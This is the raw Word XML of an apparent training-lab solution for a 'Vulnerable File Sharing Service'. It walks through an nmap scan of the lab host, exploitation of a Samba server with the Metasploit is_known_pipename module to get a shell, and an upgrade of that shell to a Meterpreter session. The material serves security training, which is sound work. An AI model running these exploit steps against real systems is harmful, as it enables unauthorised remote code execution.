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67E30" w14:textId="2D9443FA" w:rsidR="00853ABF" w:rsidRDefault="00E17FC6">
      <w:r w:rsidRPr="00E17FC6">
        <w:t>Vulnerable File Sharing Service</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB9BA5F" w14:textId="77777777" w:rsidR="00E17FC6" w:rsidRPr="00E17FC6" w:rsidRDefault="00E17FC6" w:rsidP="00E17FC6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E17FC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192F96E5" w14:textId="77777777" w:rsidR="00E17FC6" w:rsidRPr="00E17FC6" w:rsidRDefault="00E17FC6" w:rsidP="00E17FC6">
      <w:r w:rsidRPr="00E17FC6">
        <w:t>In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E17FC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E17FC6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BC9480" w14:textId="77777777" w:rsidR="00E17FC6" w:rsidRPr="00E17FC6" w:rsidRDefault="00E17FC6" w:rsidP="00E17FC6">
      <w:r w:rsidRPr="00E17FC6">
        <w:t>Your task is to fingerprint the application using command line tools available on the Kali terminal and then exploit the application using the appropriate Metasploit module. Get a shell on the target!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A99CD03" w14:textId="77777777" w:rsidR="00E17FC6" w:rsidRPr="00E17FC6" w:rsidRDefault="00E17FC6" w:rsidP="00E17FC6">
      <w:r w:rsidRPr="00E17FC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E17FC6">
        <w:t> Get a shell on the target by exploiting a file-sharing service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2D5299" w14:textId="77777777" w:rsidR="00E17FC6" w:rsidRDefault="00E17FC6"/>
    <w:p w14:paraId="32F6A1D7" w14:textId="372B0EE6" w:rsidR="00E17FC6" w:rsidRPr="00E17FC6" w:rsidRDefault="00E17FC6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E17FC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBE7F55" w14:textId="77777777" w:rsidR="00E17FC6" w:rsidRPr="00E17FC6" w:rsidRDefault="00E17FC6" w:rsidP="00E17FC6">
      <w:r w:rsidRPr="00E17FC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E17FC6">
        <w:t> Open the lab link to access the Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4327C51B" w14:textId="33B56838" w:rsidR="00E17FC6" w:rsidRPr="00E17FC6" w:rsidRDefault="00E17FC6" w:rsidP="00E17FC6">
      <w:r w:rsidRPr="00E17FC6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50ED156F" wp14:editId="24E86975">
            <wp:extent cx="5943600" cy="3250565"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="844466776" name="Picture 6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185DB" w14:textId="77777777" w:rsidR="00E17FC6" w:rsidRPr="00E17FC6" w:rsidRDefault="00E17FC6" w:rsidP="00E17FC6">
      <w:r w:rsidRPr="00E17FC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E17FC6">
        <w:t> Run an Nmap scan against the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063915BA" w14:textId="77777777" w:rsidR="00E17FC6" w:rsidRPr="00E17FC6" w:rsidRDefault="00E17FC6" w:rsidP="00E17FC6">
      <w:r w:rsidRPr="00E17FC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57033B03" w14:textId="77777777" w:rsidR="00E17FC6" w:rsidRPr="00E17FC6" w:rsidRDefault="00E17FC6" w:rsidP="00E17FC6">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E17FC6">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E17FC6">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E17FC6">
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E17FC6">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E17FC6">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E17FC6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E17FC6">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="31FBD601" w14:textId="6120A08E" w:rsidR="00E17FC6" w:rsidRPr="00E17FC6" w:rsidRDefault="00E17FC6" w:rsidP="00E17FC6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BBC5788" wp14:editId="62D0C18A">
            <wp:extent cx="5943600" cy="3404235"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="5029146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914602" name="Picture 50291460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DBE21" w14:textId="77777777" w:rsidR="00E17FC6" w:rsidRPr="00E17FC6" w:rsidRDefault="00E17FC6" w:rsidP="00E17FC6">
      <w:r w:rsidRPr="00E17FC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E17FC6">
        <w:t xml:space="preserve"> We have discovered a samba server running on the target machine. Let’s use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E17FC6">
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E17FC6">
        <w:t xml:space="preserve"> module and exploit the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3283C2B1" w14:textId="77777777" w:rsidR="00E17FC6" w:rsidRPr="00E17FC6" w:rsidRDefault="00E17FC6" w:rsidP="00E17FC6">
      <w:r w:rsidRPr="00E17FC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D0DDD1" w14:textId="77777777" w:rsidR="00E17FC6" w:rsidRPr="00E17FC6" w:rsidRDefault="00E17FC6" w:rsidP="00E17FC6">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E17FC6">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E17FC6">
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDA4269" w14:textId="77777777" w:rsidR="00E17FC6" w:rsidRPr="00E17FC6" w:rsidRDefault="00E17FC6" w:rsidP="00E17FC6">
      <w:r w:rsidRPr="00E17FC6">
        <w:t>use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E17FC6">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E17FC6">
        <w:t>/samba/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E17FC6">
        <w:t>is_known_pipename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1632ABC9" w14:textId="77777777" w:rsidR="00E17FC6" w:rsidRPr="00E17FC6" w:rsidRDefault="00E17FC6" w:rsidP="00E17FC6">
      <w:r w:rsidRPr="00E17FC6">
        <w:t xml:space="preserve">set RHOST </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E17FC6">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="30F4F864" w14:textId="77777777" w:rsidR="00E17FC6" w:rsidRPr="00E17FC6" w:rsidRDefault="00E17FC6" w:rsidP="00E17FC6">
      <w:r w:rsidRPr="00E17FC6">
        <w:t>check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E9DAE9" w14:textId="77777777" w:rsidR="00E17FC6" w:rsidRPr="00E17FC6" w:rsidRDefault="00E17FC6" w:rsidP="00E17FC6">
      <w:r w:rsidRPr="00E17FC6">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667FFA87" w14:textId="77777777" w:rsidR="00E17FC6" w:rsidRDefault="00E17FC6" w:rsidP="00E17FC6">
      <w:r w:rsidRPr="00E17FC6">
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E04934" w14:textId="48F0AE21" w:rsidR="000C6A11" w:rsidRPr="00E17FC6" w:rsidRDefault="000C6A11" w:rsidP="00E17FC6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5454F311" wp14:editId="46E3CBF3">
            <wp:extent cx="5943600" cy="1435100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1626052204" name="Picture 9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052204" name="Picture 9" descr="A screenshot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AFDBC" w14:textId="01C24572" w:rsidR="00E17FC6" w:rsidRPr="00E17FC6" w:rsidRDefault="000C6A11" w:rsidP="00E17FC6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14EED3C0" wp14:editId="7E6AEE03">
            <wp:extent cx="5943600" cy="3633470"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="15707990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799017" name="Picture 157079901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4F654" w14:textId="77777777" w:rsidR="00E17FC6" w:rsidRPr="00E17FC6" w:rsidRDefault="00E17FC6" w:rsidP="00E17FC6">
      <w:r w:rsidRPr="00E17FC6">
        <w:t>We successfully obtained the shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1A6381" w14:textId="34B6E0F5" w:rsidR="00E17FC6" w:rsidRDefault="006B79CF">
      <w:r>
        <w:t>Ctrl+z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C6D51B" w14:textId="0A92D277" w:rsidR="006B79CF" w:rsidRDefault="006B79CF">
      <w:r>
        <w:t xml:space="preserve">Now convert this shell to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679539FF" w14:textId="44166C42" w:rsidR="006B79CF" w:rsidRDefault="006B79CF">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006B79CF">
        <w:t xml:space="preserve">search  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B79CF">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006B79CF">
        <w:t>_to_meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69C2595F" w14:textId="1388BCBB" w:rsidR="006B79CF" w:rsidRDefault="006B79CF">
      <w:r>
        <w:t>use 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150EE195" w14:textId="334B0C7A" w:rsidR="006B79CF" w:rsidRDefault="006B79CF">
      <w:r w:rsidRPr="006B79CF">
        <w:t>set LHOST eth1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357BE4F9" w14:textId="3A817612" w:rsidR="006B79CF" w:rsidRDefault="006B79CF">
      <w:r w:rsidRPr="006B79CF">
        <w:t>sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCBBAE8" w14:textId="5D876B85" w:rsidR="006B79CF" w:rsidRDefault="006B79CF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F34B817" wp14:editId="73B21CED">
            <wp:extent cx="5943600" cy="2876550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2041321089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321089" name="Picture 10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0BFB8" w14:textId="6A18E1DB" w:rsidR="006B79CF" w:rsidRDefault="006B79CF">
      <w:r>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7E11BB" w14:textId="4A46A6D9" w:rsidR="006B79CF" w:rsidRDefault="006B79CF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="137BBC7C" wp14:editId="5063CF7E">
            <wp:extent cx="5943600" cy="2600960"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="218789320" name="Picture 1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789320" name="Picture 11" descr="A computer screen shot of a pro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5CF20" w14:textId="4FE1934D" w:rsidR="006B79CF" w:rsidRDefault="006B79CF">
      <w:r>
        <w:t>Sessions -I 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6905A112" w14:textId="7C360FDF" w:rsidR="006B79CF" w:rsidRDefault="006B79CF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="410BD17A" wp14:editId="617E0061">
            <wp:extent cx="5943600" cy="4157980"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2084117224" name="Picture 12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117224" name="Picture 12" descr="A computer screen shot of a computer program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30E6D" w14:textId="76206C06" w:rsidR="006B79CF" w:rsidRDefault="006B79CF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54DD077B" wp14:editId="09EBD2B7">
            <wp:extent cx="5296172" cy="1327218"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1106425575" name="Picture 1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425575" name="Picture 13" descr="A screen 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172" cy="1327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79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FD2"/>
    <w:rsid w:val="000C6A11"/>
    <w:rsid w:val="002A5DFC"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="006B79CF"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00B31FD2"/>
    <w:rsid w:val="00D546EB"/>
    <w:rsid w:val="00E17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91701"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D13D2B98-F48C-4891-B4A0-00AB81944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F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F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F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F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F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F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F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F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F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F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F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F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F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F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F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F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F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F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F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F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F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F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F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F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F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F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F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F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F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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.tmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6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124</Words>
  <Characters>906</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>31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5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-08T14:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-08T14:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>